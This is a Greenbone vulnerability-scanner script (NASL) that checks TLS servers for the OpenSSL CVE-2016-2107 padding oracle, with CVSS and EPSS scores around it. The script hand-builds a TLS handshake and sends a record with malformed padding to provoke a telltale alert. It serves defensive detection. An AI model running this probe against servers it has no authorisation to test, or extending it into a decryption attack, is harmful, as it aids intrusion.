2.6 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:H/Au:N/C:P/I:N/A:N
5.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
8.2 High
AI Score
Confidence
Low
0.967 High
EPSS
Percentile
99.7%
OpenSSL is prone to padding oracle attack.
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.107141");
script_version("2023-07-25T05:05:58+0000");
script_cve_id("CVE-2016-2107");
script_tag(name:"cvss_base", value:"2.6");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:P/I:N/A:N");
script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2022-09-01 16:22:00 +0000 (Thu, 01 Sep 2022)");
script_tag(name:"creation_date", value:"2017-03-30 12:21:46 +0100 (Thu, 30 Mar 2017)");
script_name("SSL/TLS: OpenSSL 'CVE-2016-2107' Padding Oracle Vulnerability");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_dependencies("gb_tls_version_get.nasl");
script_family("SSL and TLS");
script_mandatory_keys("ssl_tls/port");
script_xref(name:"URL", value:"https://www.openssl.org/news/secadv/20160503.txt");
script_tag(name:"summary", value:"OpenSSL is prone to padding oracle attack.");
script_tag(name:"vuldetect", value:"Send an encrypted padded message and check the returned alert (Record Overflow
if vulnerable, Bad Record Mac if no vulnerable.");
script_tag(name:"insight", value:"The vulnerability is due to not considering memory allocation during a certain
padding check.");
script_tag(name:"impact", value:"Exploiting this vulnerability allows remote attackers to obtain sensitive cleartext
information via a padding oracle attack against an AES CBC session.");
script_tag(name:"affected", value:"OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h.");
script_tag(name:"solution", value:"OpenSSL 1.0.2 users should upgrade to 1.0.2h.
OpenSSL 1.0.1 users should upgrade to 1.0.1t.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"exploit");
exit(0);
}
include("mysql.inc");
include("misc_func.inc");
include("list_array_func.inc");
include("byte_func.inc");
include("ssl_funcs.inc");
if( defined_func( "prf_sha256" ) &&
defined_func( "tls1_prf" ) &&
defined_func( "rsa_public_encrypt" ) &&
defined_func( "aes128_cbc_encrypt" ) ) {
if( ! port = tls_ssl_get_port() )
exit( 0 );
if( ! sslversion = get_supported_tls_version( port:port, min:TLS_10, max:TLS_12 ) )
exit( 0 );
if( ! soc = open_ssl_socket( port:port ) )
exit( 0 );
protocolversion = TLS_12;
MASTER_SECRET_LABEL = "master secret";
CLIENT_FINISHED_LABEL = "client finished";
KEY_EXPANSION_LABEL = "key expansion";
CHANGE_CIPHER_SPEC_LENGTH = raw_string( 0x00, 0x01 );
CHANGE_CIPHER_SPEC_MESSAGE = raw_string( 0x01 );
RANDOM = 28;
UNIX_TIME = 4;
PREMASTER_SECRET = 48;
MASTER_SECRET = 48;
SECRET_SET_SIZE = 72;
selectedCipherSuite = sslv3_tls_raw_ciphers['TLS_RSA_WITH_AES_128_CBC_SHA'];
clientRandom = raw_string( dec2hex( num:unixtime() ) ) + raw_string( rand_str( length:RANDOM ) );
hello = ssl_hello( port:port, version:sslversion, ciphers:selectedCipherSuite, random:clientRandom, handshake_version:protocolversion, add_tls_renegotiation_info:FALSE );
if( ! hello ) {
close( soc );
exit( 0 );
}
send( socket:soc, data:hello );
hello_done = FALSE;
while( ! hello_done ) {
data = ssl_recv( socket:soc );
if( ! data ) {
close( soc );
exit( 0 );
}
serverhello = search_ssl_record( data:data, search:make_array( "handshake_typ", SSLv3_SERVER_HELLO ) );
if( serverhello ) {
serverUnixTime = serverhello["time"];
serverUnixTimehex = dec2hex( num:serverUnixTime );
serverUnixTime = raw_string( serverUnixTimehex );
randomserver = serverhello["random"];
sessionId = serverhello["session_id"];
sessionIdLength = serverhello["session_id_len"];
selectedCipher = mkword( serverhello["cipher_spec"] );
}
certificate = search_ssl_record( data:data, search:make_array( "handshake_typ", SSLv3_CERTIFICATE ) );
if( certificate ) {
foreach cert( certificate["cert_list"] ) {
if( ! certobj = cert_open( cert ) )
continue;
modulus = cert_query( certobj, "modulus" );
exponent = cert_query( certobj, "exponent" );
cert_close( certobj );
if( modulus )
modulus = substr( modulus, 1 );
if( modulus && exponent )
break;
}
}
serverhellodone = search_ssl_record( data:data, search:make_array( "handshake_typ", SSLv3_SERVER_HELLO_DONE ) );
if( serverhellodone ) {
hello_done = TRUE;
break;
}
}
if( ! modulus ) {
close( soc );
exit( 0 );
}
keyByteLength = strlen( modulus );
randomByteLength = keyByteLength - PREMASTER_SECRET - 3;
padding = crap( data:raw_string( 0x03 ), length:randomByteLength );
need = ( PREMASTER_SECRET - 2 ) * 8;
premasterSecret = protocolversion + bn_random( need:need );
PlainPaddedPremasterSecret = raw_string( 0x00, 0x02 ) + padding + raw_string( 0x00 ) + premasterSecret;
paddedPremasterSecret = PlainPaddedPremasterSecret;
random_length = 2 * ( RANDOM + UNIX_TIME );
serverrandom = serverUnixTime + randomserver;
random = clientRandom + serverrandom;
mastersecret = prf_sha256( secret:premasterSecret, seed:random, label:MASTER_SECRET_LABEL, outlen:MASTER_SECRET );
encrypted = rsa_public_encrypt( data:paddedPremasterSecret, e:exponent, n:modulus, pad:FALSE );
##Sending ClientKeyExchange message
Premaster_length = data_len( data:encrypted );
ckedata = data_len( data:encrypted ) + encrypted;
hdlen = raw_string( 0x00 ) + data_len( data:ckedata );
data = raw_string( SSLv3_CLIENT_KEY_EXCHANGE ) + hdlen + ckedata;
cke_len = data_len( data:data );
cke = raw_string( SSLv3_HANDSHAKE ) + protocolversion + cke_len + data;
ehashmsg = raw_string( SSLv3_HANDSHAKE ) + protocolversion + data_len( data:mastersecret ) + mastersecret;
KeySize = 16;
readMacsize = 20;
writeMacsize = 20;
random = serverrandom + clientRandom;
keyBlock = prf_sha256( secret:mastersecret, seed:random, label:KEY_EXPANSION_LABEL, outlen:SECRET_SET_SIZE );
offset = 0;
for( i = offset; i < readMacsize; i++ ) {
clientMacWriteSecret+= keyBlock[i];
}
offset += readMacsize;
for( i = offset; i < offset + writeMacsize; i++ ) {
serverMacWriteSecret += keyBlock[i];
}
offset += writeMacsize;
for( i = offset; i < offset + KeySize; i++ ) {
clientWriteKey += keyBlock[i];
}
offset += KeySize;
for( i = offset; i < offset+KeySize; i++ ) {
serverWriteKey += keyBlock[i];
}
#generate IV:
need = 16 * 8;
clientWriteIv = bn_random( need:need );
serverWriteIv = bn_random( need:need );
need = 32 * 8;
handshakeMessagesHash = bn_random( need:need );
datatoencrypt = crap( length:32, data:raw_string( 0x3f ) );
encdata1 = aes128_cbc_encrypt( data:datatoencrypt, key:clientWriteKey, iv:clientWriteIv );
encdata = clientWriteIv + encdata1;
ehashmsg = raw_string( SSLv3_HANDSHAKE ) + protocolversion + data_len( data:encdata ) + encdata;
ccs = raw_string( SSLv3_CHANGECIPHERSPEC ) + protocolversion + CHANGE_CIPHER_SPEC_LENGTH + CHANGE_CIPHER_SPEC_MESSAGE;
datatosend = cke + ccs + ehashmsg;
send( socket:soc, data:datatosend );
clkechange_done = FALSE;
while( ! clkechange_done ) {
data = ssl_recv( socket:soc );
if( ! data ) {
close( soc );
exit( 0 );
}
record = search_ssl_record( data:data, search:make_array( "content_typ", SSLv3_ALERT ) );
if( record ) {
close( soc );
if( record["level"] == SSLv3_ALERT_FATAL && record["description"] == SSLv3_ALERT_RECORD_OVERFLOW ) {
report = "It was possible to send an encrypted data with malformed padding and receive Record Overflow alert from the SSL/TLS Server";
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
}
record = search_ssl_record( data:data, search:make_array( "handshake_typ", SSLv3_SERVER_HELLO_DONE ) );
if( record ) {
clkechange_done = TRUE;
break;
}
}
if ( soc )
close( soc );
}
exit( 0 );
2.6 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:H/Au:N/C:P/I:N/A:N
5.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
8.2 High
AI Score
Confidence
Low
0.967 High
EPSS
Percentile
99.7%